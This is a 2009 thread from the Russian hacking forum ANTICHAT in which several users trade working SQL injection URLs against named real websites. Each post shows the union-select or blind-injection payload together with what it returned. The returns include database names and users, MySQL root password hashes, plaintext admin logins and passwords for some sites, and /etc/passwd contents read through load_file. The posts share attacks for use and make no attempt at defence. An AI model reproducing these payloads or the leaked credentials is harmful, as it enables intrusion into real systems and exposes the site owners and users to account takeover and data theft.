ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.03.2009, 19:42
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
«Информационные технологии и телерадиокоммуникации» - электронный журнал - http://ittc.ksu.ru
Код:
http://ittc.ksu.ru/?id=-29+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11--
user(): ittcdb@localhost
database(): ittcdb
version(): 5.0.67
PR=4
читаем таблицы
Код:
http://ittc.ksu.ru/?id=-29+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+INFORMATION_schema.tables+limit+0,1--
Holistic Health Yellow Pages and Supersite
Код:
http://www.findhealer.com/ref/docdetail.php3?id=-29+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--
user(): chinamed@localhost
database(): chinamed
version(): 4.1.21-standard
PR=4
|
|
|
29.03.2009, 20:33
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.bulgariahousehunting.com/details.php?id=116+AND+SUBSTRING((y=1..3()),1,1)=x--
y1=version
y2=database
y3=user
x=Version : 4.1.22-log
Database : bulgar_house
User : krasig@localhost
|
|
|
|
29.03.2009, 22:11
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
www.baspublishing.com.au
Код:
http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,user,password,file_priv),3,4,5+from+mysql.user--
Логин/пасс:
Код:
root:164378093c1aa083
file_priv - Y
Читает etc/passwd:
Код:
http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,load_file(0x2f6574632f706173737764),3,4,5+from+mysql.user--
Код:
# $FreeBSD: src/etc/master.passwd,v 1.25.2.1 2001/11/24 17:22:24 gshapiro Exp $ # root:*:0:0:Charlie &:/root:/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system proces
На сервере крутится FreeBSD.
------------------------------------------------------------------
The End!
|
|
|
|
29.03.2009, 23:11
|
|
Участник форума
Регистрация: 17.08.2008
Сообщений: 212
Провел на форуме:
1063099
Репутация:
186
|
|
http://travel.chinavista.com
Код:
http://travel.chinavista.com/culture2.php?id=1+union+select+1,table_name+from+information_schema.tables/*
|
|
|
|
30.03.2009, 00:28
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
http://www.transtriumf.com/line.php?id=-8+UNION+SELECT+1,2,3,4,5,6,7,8/*
Database Version: 4.0.16-Max-log
Database name: transtriumf
User name: transtriumf@localhost
|
|
|
|
30.03.2009, 05:46
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
<<NovoNews>>
Код:
http://www.novonews.lv/index.php?mode=news&id=-70666'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15--+
db: 5.0.22-log
name_db: novonews_v2
user: novonews_v2_adm@192.168.1.1
log: dima
pass: amid643
email: dimzulu@gmail.com
http://www.novonews.lv/admin/index.php?login
<<Стоматит>>
Код:
http://www.dentoprofile.ru/php/content.php?id=577+and+ascii(substring(version(),1,1))=52--+
database: 4.0.16
<<SFCB>>
Код:
http://www.sfcb.org/php/category.php?id=1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*
db: 4.1.22
name_db: sfcb
user: sfcbor@localhost
<<AveDesk>>
Код:
http://www.avedesk.org/desklet.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10--
db: 5.0.67
name_db: dfilezon_avedesk
user: dfilezon_ave@localhost
log: addd
pass: fff
Последний раз редактировалось jokester; 30.03.2009 в 14:59..
Причина: ombu.primorsky.ru и suzdalfest.ru БОЯНы, причём первый ты-же сам и выкладывал, ПОВНИМАТЕЛЬНЕЕ
|
|
|
|
30.03.2009, 14:45
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772
Репутация:
10
|
|
Код:
http://www.ausit.org/eng/showpage.php3?id=-650+union+select+concat_ws(0x20,version(),database(),user()),2,3
Database Version: 4.1.25-log
Database name: ausit2
User name: dream@localhost |
|
|
|
30.03.2009, 15:08
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Код:
http://www.conferencedes19cpas.irisnet.be/cpas2.php?id=4+union+select+1,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+limit+1,1/*
version():4.1.11-Debian_4sarge8-log
database():db_cpasbru
user():cpasbru@organa.irisnet.be
__
Код:
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/*
version():5.0.27
database():IIHE
user():root@localhost
Код:
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/*
root:710789ba2a55b808
Код:
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,load_file(%27/etc/passwd%27),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/*
Последний раз редактировалось M.W.N.N.; 30.03.2009 в 15:15..
|
|
|
|
30.03.2009, 15:54
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
<<MAXIM>>
Код:
http://www.maxim-stroy.ru/catalog/index.php?id=-80+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10,11,12,13--+
db: 5.0.67-log
name_db: u72532
user: u72532@10.10.223.239
log: admin
pass: max77 |
|
|
|
30.03.2009, 16:21
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
www.auroragroup.com.au
Колонки из Information_schema:
Код:
articles,galleries,photos,phplist_admin,phplist_admin_attribute,phplist_admin_task,phplist_adminattribute,phplist_attachment,phplist_bounce,phplist_bounceregex,phplist_bounceregex_bounce,phplist_config,phplist_eventlog,phplist_linktrack,phplist_linktrack_userclick,phplist_list,phplist_listmessage,phplist_listrss,phplist_listuser,phplist_message,phplist_message_attachment,phplist_messagedata,phplist_rssitem,phplist_rssitem_data,phplist_rssitem_user,phplist_sendprocess,phplist_subscribepage,phplist_subscribepage_data,phplist_task,phplist_template,phplist_templateimage,phplist_urlcache,phplist_user_attribute,phplist_user_blacklist,phplist_user_blacklist_data,phplist_user_message_bounce,phplist_user_message_forward,phplist_user_rss,phplist_user_user,phplist_user_user_attribute,php Return to gallery
Меня заимнересовала колонка phplist_admin
Её структура:
Код:
id,loginname,namelc,email,created,modified,modifiedby,password,passwordchanged,superuser,disabled
Вывод:
Код:
http://www.auroragroup.com.au/viewphoto.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,id,loginname,namelc,email,created,modified,modifiedby,password,passwordchanged,superuser,disabled)+from+phplist_admin--
------------------------------------------------------------------------------------------------------
The End!
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
